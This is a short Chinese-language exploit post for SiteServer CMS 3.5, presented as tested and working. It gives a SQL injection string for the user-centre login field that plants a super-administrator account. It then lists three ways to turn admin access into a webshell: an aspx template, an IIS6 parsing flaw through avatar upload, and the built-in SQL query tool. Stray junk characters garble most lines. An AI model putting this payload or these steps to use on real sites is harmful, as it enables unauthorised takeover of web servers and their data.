经测试秒杀最新的3.5版1 J0 C' }: {" [0 y
stieserver官网:www.siteserver.cn
. b% Z ?$ a Y" F! [EXP:
3 u7 e A# U# P. J) K& `: `$ j! N直接访问UserCenter/login.aspx
" `+ [9 F* \8 J* s$ n用户名处输入:
2 [( k* O8 Q% a3 y) E% ?, M# i0 Q3 @- n* q1 P/ W
123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
# y2 v! a1 D+ [8 J' c4 S密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue 密码为lanhai的超级用户。$ p7 H$ l* g' m6 o
之后再访问后台SiteServer/login.aspx用插入的用户登陆5 S1 E% f& P7 B/ S0 k# \
后台拿webshell的三种方法:5 U& j5 ?* X. ~' e6 s
一、, D6 |5 P6 s+ M9 [
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
# K2 X/ B+ L" y+ L二、0 Q. P; n! h; n2 n
成员权限-》添加用户-》用户名为:1.asp/ D7 n! h+ B4 L* W) |
http://127.0.0.1/usercenter/ }1 ^' r. A( N* k$ N3 g8 o
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell/ b, _% S/ s& L( }* Y# r0 V* j" E
(ps:后台添加用户时不会验证是否含有非法字符)
: b; e: N% G5 G2 l三、
0 T" `" A5 z& u# j" }' \; T! c系统工具-》实用工具-》机器参数查看9 |( X8 p) u. p6 Z6 W
可以看到数据库类型、名称,WEB路径! `* Z2 A/ V4 P/ ^
系统工具-》数据库工具-》SQL语句查询: J- M; v6 `% f, N
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO |